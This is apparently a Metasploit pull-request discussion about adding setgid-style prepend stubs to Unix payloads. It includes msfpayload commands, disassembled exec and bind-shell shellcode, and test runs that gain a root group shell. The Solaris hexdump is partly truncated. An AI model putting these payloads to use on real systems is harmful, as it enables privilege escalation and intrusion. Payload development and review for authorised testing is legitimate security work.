add PrependSet[re]gid support for unix* payloads #885
Conversation
Looked at the linux x86 case. Disass looks good:

```
$ ./msfpayload linux/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_sh.raw
$ ndisasm exec_sh.raw
00000000  31C9              xor cx,cx              // PrependSetresgid
00000002  31DB              xor bx,bx
00000004  F7E3              mul bx
00000006  B0AA              mov al,0xaa
00000008  CD80              int 0x80
0000000A  31C9              xor cx,cx              // PrependSetregid
0000000C  31DB              xor bx,bx
0000000E  6A47              push byte +0x47
00000010  58                pop ax
00000011  CD80              int 0x80
00000013  31DB              xor bx,bx              // PrependSetgid
00000015  6A2E              push byte +0x2e
00000017  58                pop ax
00000018  CD80              int 0x80
0000001A  6A0B              push byte +0xb         // Shellcode
0000001C  58                pop ax
0000001D  99                cwd
0000001E  52                push dx
0000001F  66682D6389E7      push dword 0xe789632d
00000025  682F73            push word 0x732f
00000028  680068            push word 0x6800
0000002B  2F                das
0000002C  62696E            bound bp,[bx+di+0x6e]
0000002F  89E3              mov bx,sp
00000031  52                push dx
00000032  E80A00            call word 0x3f
00000035  0000              add [bx+si],al
00000037  2F                das
00000038  62696E            bound bp,[bx+di+0x6e]
0000003B  2F                das
0000003C  626173            bound sp,[bx+di+0x73]
0000003F  680057            push word 0x5700
00000042  53                push bx
00000043  89E1              mov cx,sp
00000045  CD80              int 0x80
```

And the test on Debian 6 was successful:

```
juan@debiansmb:~$ ls -la exec_sh.elf
-rwsr-sr-x 1 root root 155 Oct 11 12:27 exec_sh.elf
juan@debiansmb:~$ id
uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)
juan@debiansmb:~$ ./exec_sh.elf
bash-4.1$ id
uid=1000(juan) gid=0(root) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)
```
The Linux case for x86_64 platforms also looks good to me. The output for:

```
./msfpayload linux/x64/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_64_sh.raw
```

is:

```
00000000  4831FF            xor rdi,rdi            // PrependSetresgid
00000003  4889FE            mov rsi,rdi
00000006  6A77              push byte +0x77
00000008  58                pop rax
00000009  0F05              loadall286
0000000B  4831FF            xor rdi,rdi            // PrependSetregid
0000000E  4889FE            mov rsi,rdi
00000011  4889F2            mov rdx,rsi
00000014  6A72              push byte +0x72
00000016  58                pop rax
00000017  0F05              loadall286
00000019  4831FF            xor rdi,rdi            // PrependSetgid
0000001C  6A6A              push byte +0x6a
0000001E  58                pop rax
0000001F  0F05              loadall286
00000021  6A3B              push byte +0x3b        // shellcode
00000023  58                pop rax
00000024  99                cdq
00000025  48BB2F62696E2F73  mov rbx,0x68732f6e69622f
         -6800
0000002F  53                push rbx
00000030  4889E7            mov rdi,rsp
00000033  68                db 0x68
00000034  2D63000048        sub eax,0x48000063
00000039  89E6              mov esi,esp
0000003B  52                push rdx
0000003C  E80A000000        call dword 0x4b
00000041  2F                db 0x2f
00000042  62                db 0x62
00000043  696E2F62617368    imul ebp,[rsi+0x2f],dword 0x68736162
0000004A  005657            add [rsi+0x57],dl
0000004D  4889E6            mov rsi,rsp
00000050  0F05              loadall286
```

And it is working, tested on an Ubuntu 10.04 x86_64:

```
test@ubuntu:~$ ls -la exec_64_sh.elf
-rwsr-sr-x 1 root root 202 2012-10-11 04:03 exec_64_sh.elf
test@ubuntu:~$ id -G
1002 4 20 21 24 25 26 30 44 46 104
test@ubuntu:~$ ./exec_64_sh.elf
bash-4.1$ id -G
0 4 20 21 24 25 26 30 44 46 104 1002
bash-4.1$ id -g
0
```
On the other hand... when testing the osx x86 case:

```
$ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > osx_x86.raw
```

There is just the shellcode; none of the prepended code is there:

```
$ ndisasm -b 32 osx_x86.raw
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  E80A000000        call 0x12
00000008  2F                das
00000009  62696E            bound ebp,[ecx+0x6e]
0000000C  2F                das
0000000D  626173            bound esp,[ecx+0x73]
00000010  68005E89E7        push dword 0xe7895e00
00000015  B90A000000        mov ecx,0xa
0000001A  FC                cld
0000001B  F2A4              repne movsb
0000001D  89E3              mov ebx,esp
0000001F  50                push eax
00000020  50                push eax
00000021  53                push ebx
00000022  B03B              mov al,0x3b
00000024  50                push eax
00000025  CD80              int 0x80
```

The same when using just the PrependSetuid option:

```
$ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetuid=true R > osx_x86.raw
Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 osx_x86.raw
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  E80A000000        call 0x12
00000008  2F                das
00000009  62696E            bound ebp,[ecx+0x6e]
0000000C  2F                das
0000000D  626173            bound esp,[ecx+0x73]
00000010  68005E89E7        push dword 0xe7895e00
00000015  B90A000000        mov ecx,0xa
0000001A  FC                cld
0000001B  F2A4              repne movsb
0000001D  89E3              mov ebx,esp
0000001F  50                push eax
00000020  50                push eax
00000021  53                push ebx
00000022  B03B              mov al,0x3b
00000024  50                push eax
00000025  CD80              int 0x80
```

I think here the problem is in the exec payload module for osx x86, because it isn't including the mixin Msf::Payload::Osx, so the generate() function is not being redefined! btw: the exec payload module is the only osx payload module which doesn't include the Msf::Payload::Osx mixin. Anyway, I'll ask a more experienced developer to review it.
While testing this pull request... I'm thinking about why these prepends weren't available in msf, maybe because from the exploit point of view the uid is more interesting than the gid.... anyway I'll be checking this topic with more experienced developers!
In the case of BSD the prepending is working as expected:

```
$ ./msfpayload bsd/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_bsd.raw
Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 exec_bsd.raw
00000000  31C0              xor eax,eax            //PrependSetresgid
00000002  50                push eax
00000003  50                push eax
00000004  50                push eax
00000005  50                push eax
00000006  66B83801          mov ax,0x138
0000000A  CD80              int 0x80
0000000C  31C0              xor eax,eax            //PrependSetregid
0000000E  50                push eax
0000000F  50                push eax
00000010  50                push eax
00000011  B07F              mov al,0x7f
00000013  CD80              int 0x80
00000015  31C0              xor eax,eax            //PrependSetgid
00000017  50                push eax
00000018  50                push eax
00000019  B0B5              mov al,0xb5
0000001B  CD80              int 0x80
0000001D  6A3B              push byte +0x3b        //shellcode
0000001F  58                pop eax
00000020  99                cdq
00000021  52                push edx
00000022  682D630000        push dword 0x632d
00000027  89E7              mov edi,esp
00000029  52                push edx
0000002A  686E2F7368        push dword 0x68732f6e
0000002F  682F2F6269        push dword 0x69622f2f
00000034  89E3              mov ebx,esp
00000036  52                push edx
00000037  E80A000000        call 0x46
0000003C  2F                das
0000003D  62696E            bound ebp,[ecx+0x6e]
00000040  2F                das
00000041  626173            bound esp,[ecx+0x73]
00000044  6800575389        push dword 0x89535700
00000049  E152              loope 0x9d
0000004B  51                push ecx
0000004C  53                push ebx
0000004D  50                push eax
0000004E  CD80              int 0x80
```

And when executing:

```
$ ls -la exec_bsd.elf
-rwsr-sr-x 1 root juan 162 Oct 11 20:17 exec_bsd.elf
$ ./exec_bsd.elf
# id -g
0
# id -gr
0
```
I was wrong about the solaris case, it's prepending the options correctly:

```
Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload solaris/x86/shell_bind_tcp RHOST=192.168.1.137 LPORT=4444 PrependSetregid=true R > shell_bind_solaris.raw
Juans-MacBook-Pro:metasploit-framework juan$ hexdump -C shell_bind_solaris.raw
00000000  68 ff d8 ff 3c 6a 65 89  e6 f7 56 04 f6 16 31 c0  |h...X...O.y.Ph/|
00000060  2f 73 68 68 2f 62 69 6e  89 e3 50 53 89 e1 50 51  |/shh/bin..PS..PQ|
00000070  53 b0 3b ff d6                                    |S.;..|
00000075
```

The prepending code for PrependSetregid has been added successfully at offset 0xe: `31 c0 50 50 b0 cb ff d6`

Sorry for the inconvenience!! My fault! I'm just asking a more experienced developer to do a final review of this pull request (especially the solaris case) and #919 before merging!
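Added example (not Metasploit's own code and not part of this PR): a minimal Ruby model of the two things the comments above rely on. First, the mixin behaviour behind the osx/x86/exec problem, where a Prepend option only takes effect if the payload class includes a platform mixin whose generate() applies it; a class without the mixin falls through to the base generate() and the option is silently ignored. Second, the offset check done by hand with hexdump on the Solaris output, here as a function that returns where a given stub sits in the raw payload. Class, module and method names are assumptions; the stub bytes are the Linux x86 setgid stub from the ndisasm listing earlier in the thread, and the payload body bytes are constructed placeholders, not real shellcode.

```ruby
# Added illustration, not Metasploit's code: why a Prepend* option is dropped
# when the payload class does not include the platform mixin that overrides
# generate(), and how to check the raw output for the prepended stub.

# Linux x86 setgid(0) stub as it appears in the ndisasm listing above:
#   31 DB   xor ebx,ebx
#   6A 2E   push byte +0x2e   (setgid syscall number)
#   58      pop eax
#   CD 80   int 0x80
SETGID_STUB = "\x31\xdb\x6a\x2e\x58\xcd\x80".b

# Base payload: a datastore of options and a body. Its generate() returns the
# body alone and knows nothing about Prepend options (assumed structure).
class BasePayload
  attr_reader :datastore

  def initialize(body, datastore = {})
    @body = body.b
    @datastore = datastore
  end

  def generate
    @body.dup
  end
end

# Platform mixin (assumed name): overrides generate() so that the stub is
# emitted in front of whatever the base class produces when the option is set.
module PrependMixin
  def generate
    out = "".b
    out << SETGID_STUB if datastore['PrependSetgid']
    out << super
  end
end

# Payload that includes the mixin: Prepend options are honoured.
class PayloadWithMixin < BasePayload
  include PrependMixin
end

# Models the osx/x86/exec situation described in the thread: no mixin, so the
# base generate() runs and the option is silently ignored.
class PayloadWithoutMixin < BasePayload
end

# Constructed placeholder body; not real shellcode.
BODY = "\x90\x90\xcc".b

# Offset of +stub+ inside +raw+, or nil if it is absent. This is the check the
# hexdump inspection above performs by eye (the Solaris stub at offset 0xe).
def stub_offset(raw, stub)
  raw.b.index(stub.b)
end

# True when the generated payload starts with the setgid stub.
def prepend_applied?(payload)
  stub_offset(payload.generate, SETGID_STUB) == 0
end

if __FILE__ == $0
  ds = { 'PrependSetgid' => true }
  puts "with mixin:    #{prepend_applied?(PayloadWithMixin.new(BODY, ds))}"
  puts "without mixin: #{prepend_applied?(PayloadWithoutMixin.new(BODY, ds))}"
end
```

The point of the model is that the option check lives in the mixin's generate(), not in the base class, so a payload module that forgets the include produces output that looks valid but never contains the stub; checking the raw bytes, as the comments in this thread do with ndisasm and hexdump, is the only way to notice it.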
Finally merged :) thanks mephos! |
No description provided.